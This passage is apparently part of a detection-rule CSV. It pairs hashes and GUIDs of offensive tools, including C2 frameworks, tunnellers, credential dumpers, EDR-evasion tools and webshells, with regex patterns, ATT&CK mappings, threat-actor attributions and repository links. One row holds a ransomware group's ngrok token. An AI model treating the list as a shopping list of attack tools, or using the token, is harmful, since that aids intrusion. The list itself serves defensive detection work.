"*27dca74d091f98b35dd158f7060e06b7020068448c731a40b6c2bf98d7c4f2d8*",".{0,1000}27dca74d091f98b35dd158f7060e06b7020068448c731a40b6c2bf98d7c4f2d8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23587" "*27E42E24-9F76-44E2-B1D6-82F68D5C4466*",".{0,1000}27E42E24\-9F76\-44E2\-B1D6\-82F68D5C4466.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 
operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","#GUIDproject","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","23589" "*27e71eebac244f803d825159fe3b1971c9bfb169*",".{0,1000}27e71eebac244f803d825159fe3b1971c9bfb169.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","23591" "*27f12aba29935f8a06182f8e7d7263dc7d01280fc2a1cc70aafecb2c87079be9*",".{0,1000}27f12aba29935f8a06182f8e7d7263dc7d01280fc2a1cc70aafecb2c87079be9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23592" "*27f1C8X9cfrYlKDqSViVB3O98xj_56MqzcTRpNGioTnpwbJVj*",".{0,1000}27f1C8X9cfrYlKDqSViVB3O98xj_56MqzcTRpNGioTnpwbJVj.{0,1000}","offensive_tool_keyword","Dispossessor","ngrok authent token used by Dispossessor ransomware group","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002","TA0011 - TA0010 - TA0005","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","23593" 
"*27f443acc6d3ba9588017121dc2e70f8aed6224a69d8f41b0a51afb21b8fd259*",".{0,1000}27f443acc6d3ba9588017121dc2e70f8aed6224a69d8f41b0a51afb21b8fd259.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","23595" "*27f70a1d533f7a3b8703d89904ae4541d96c8c656661872a495f592f9ed80d9e*",".{0,1000}27f70a1d533f7a3b8703d89904ae4541d96c8c656661872a495f592f9ed80d9e.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#filehash","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","23597" "*27F85701-FD37-4D18-A107-20E914F8E779*",".{0,1000}27F85701\-FD37\-4D18\-A107\-20E914F8E779.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","#GUIDproject","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","23598" "*28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be*",".{0,1000}28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23600" "*2801fabd9ad692f666d98e5850cd634681d7ffb3c71bbe9badfef2f81d35605b*",".{0,1000}2801fabd9ad692f666d98e5850cd634681d7ffb3c71bbe9badfef2f81d35605b.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23601" "*28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd*",".{0,1000}28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23603" "*282664f0cbf48838d9ef0321b748721b14dd40948e0f16babdb31e458e06dbe6*",".{0,1000}282664f0cbf48838d9ef0321b748721b14dd40948e0f16babdb31e458e06dbe6.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23605" "*28272a895f6980919f0a7acd8bfda4435c2a1a0b151c90f1113eda1eff12abd0*",".{0,1000}28272a895f6980919f0a7acd8bfda4435c2a1a0b151c90f1113eda1eff12abd0.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement 
that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","23606" "*282dd8c14f421dae167e02a50da13d210e34059230779eb30b70e222b04e55c6*",".{0,1000}282dd8c14f421dae167e02a50da13d210e34059230779eb30b70e222b04e55c6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23607" "*2833afc31c227a193622b57b6a5e1093add63d853a276915081095f543d62099*",".{0,1000}2833afc31c227a193622b57b6a5e1093add63d853a276915081095f543d62099.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23608" "*283516d3927c180b3f4b8d90cefaaf34ff66a5250f218fa327e194f71748e015*",".{0,1000}283516d3927c180b3f4b8d90cefaaf34ff66a5250f218fa327e194f71748e015.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - 
TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#filehash","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","23609" "*283b1a457e8aff360521928e64447e360752cc978287e51f67934fc803699c11*",".{0,1000}283b1a457e8aff360521928e64447e360752cc978287e51f67934fc803699c11.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","23610" "*283baf6fffaad806ac328d750ff3014c917378455b54d58d0ba9252a502f8dff*",".{0,1000}283baf6fffaad806ac328d750ff3014c917378455b54d58d0ba9252a502f8dff.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23611" "*284aac919a7582ec6ec1d6c71656c8177c56c1b8734834f66bc17b6d59e74b3c*",".{0,1000}284aac919a7582ec6ec1d6c71656c8177c56c1b8734834f66bc17b6d59e74b3c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23612" "*2852680c94a9d68cdab285012d9328a1ceca290db60c9e35155c2bb3e46a41b4*",".{0,1000}2852680c94a9d68cdab285012d9328a1ceca290db60c9e35155c2bb3e46a41b4.{0,1000}","offensive_tool_keyword","Malware RAT 
collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23614" "*2853789802f12b625e35704cd43b0dbcffa250d721721edd9c257c0efa940581*",".{0,1000}2853789802f12b625e35704cd43b0dbcffa250d721721edd9c257c0efa940581.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23615" "*285a2bf9a6a6a90d942d0c20832f5c0722e3aa557498cd1b6208b52932bbc18d*",".{0,1000}285a2bf9a6a6a90d942d0c20832f5c0722e3aa557498cd1b6208b52932bbc18d.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 
- T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23616" "*285e1d699b5c623b0df102e330ed97e7fa64e13dfe9b2c789a0a7dc2544e44db*",".{0,1000}285e1d699b5c623b0df102e330ed97e7fa64e13dfe9b2c789a0a7dc2544e44db.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23617" "*285ee27ec825b9a981a36594658a7943eba63fe0b4237f0110cc57729fbf3b76*",".{0,1000}285ee27ec825b9a981a36594658a7943eba63fe0b4237f0110cc57729fbf3b76.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23618" "*28625926a22131062b34670f36dafb312c2631b576bcfa0f9544994de77b6544*",".{0,1000}28625926a22131062b34670f36dafb312c2631b576bcfa0f9544994de77b6544.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","#filehash","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","23619" "*286a68fb3a355b790f127b74edb0d084749960ee7b1d9e66c1eb094c14733631*",".{0,1000}286a68fb3a355b790f127b74edb0d084749960ee7b1d9e66c1eb094c14733631.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","23620" "*286b57ee049f0d59eac77af0171bbe4d21c5e2e6ea89a0b1847c5b1fea2a9cb0*",".{0,1000}286b57ee049f0d59eac77af0171bbe4d21c5e2e6ea89a0b1847c5b1fea2a9cb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23622" "*286ccf98346d4a92af9eada9e364e279de416e110e9f1ba283f78fcb432579a2*",".{0,1000}286ccf98346d4a92af9eada9e364e279de416e110e9f1ba283f78fcb432579a2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23623" "*2873fe0d14429c67afb56a58407a9ac664b395eb0fa7c8101f69b055e3f747fa*",".{0,1000}2873fe0d14429c67afb56a58407a9ac664b395eb0fa7c8101f69b055e3f747fa.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - 
T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23625" "*287f0bded23d895ed013d7d66f062560b983f1ed8881d59e0ab7e9374bd76c73*",".{0,1000}287f0bded23d895ed013d7d66f062560b983f1ed8881d59e0ab7e9374bd76c73.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23627" "*288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd*",".{0,1000}288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23629" "*288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd*",".{0,1000}288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23630" "*288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd*",".{0,1000}288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23631" "*288b02056109591e230be8268e3e41c61f791d0025008050fc1a558118234259*",".{0,1000}288b02056109591e230be8268e3e41c61f791d0025008050fc1a558118234259.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","23632" "*289451cff336966b875ae92f5894b0b7daff939425756ba1b7f39b7e9eeedd0d*",".{0,1000}289451cff336966b875ae92f5894b0b7daff939425756ba1b7f39b7e9eeedd0d.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23635" 
"*28a29dffc8a5924a97a67798c91db2b75d5b2841ec3c810886fa5554fe2e899d*",".{0,1000}28a29dffc8a5924a97a67798c91db2b75d5b2841ec3c810886fa5554fe2e899d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23636" "*28a2e9e1ab772d0017aa994feae882eeea526fcbcb2f929ec410eabcf2912c14*",".{0,1000}28a2e9e1ab772d0017aa994feae882eeea526fcbcb2f929ec410eabcf2912c14.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","23637" "*28ab7dedd22722c58a73927d50ce8100630d002c591e4c96cb492dd1fb5f649a*",".{0,1000}28ab7dedd22722c58a73927d50ce8100630d002c591e4c96cb492dd1fb5f649a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23638" "*28b5a291efc22edff0f84eec3720d1513151a2a551b09896a7fff354cba5aaff*",".{0,1000}28b5a291efc22edff0f84eec3720d1513151a2a551b09896a7fff354cba5aaff.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23640" "*28bba6f4d8a170a77e383fe09fcc3d5258496fb45b0c226891cc51f8b96ef489*",".{0,1000}28bba6f4d8a170a77e383fe09fcc3d5258496fb45b0c226891cc51f8b96ef489.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#filehash","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","23642" "*28c0a69e67c7d310c12d3d7f2aee091e79b843cf392bb2bc503dc1b193f283e9*",".{0,1000}28c0a69e67c7d310c12d3d7f2aee091e79b843cf392bb2bc503dc1b193f283e9.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","23643" "*28c7ff1a0c4d4dd8fe1d4ef309d7784e112cd98f7ff7233085fda5b00020a18a*",".{0,1000}28c7ff1a0c4d4dd8fe1d4ef309d7784e112cd98f7ff7233085fda5b00020a18a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23644" "*28cc172cc6ee61c985f733b0546dcec41ce3c7e1ce1c6bbb59b2991425e803cb*",".{0,1000}28cc172cc6ee61c985f733b0546dcec41ce3c7e1ce1c6bbb59b2991425e803cb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23645" "*28cd619fdf0d374589890752fa44f8fa07dbcad9af8603313f6a88c8da2e2274*",".{0,1000}28cd619fdf0d374589890752fa44f8fa07dbcad9af8603313f6a88c8da2e2274.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23646" "*28CF3837-FF58-463B-AF81-E6B0039DE55F*",".{0,1000}28CF3837\-FF58\-463B\-AF81\-E6B0039DE55F.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - 
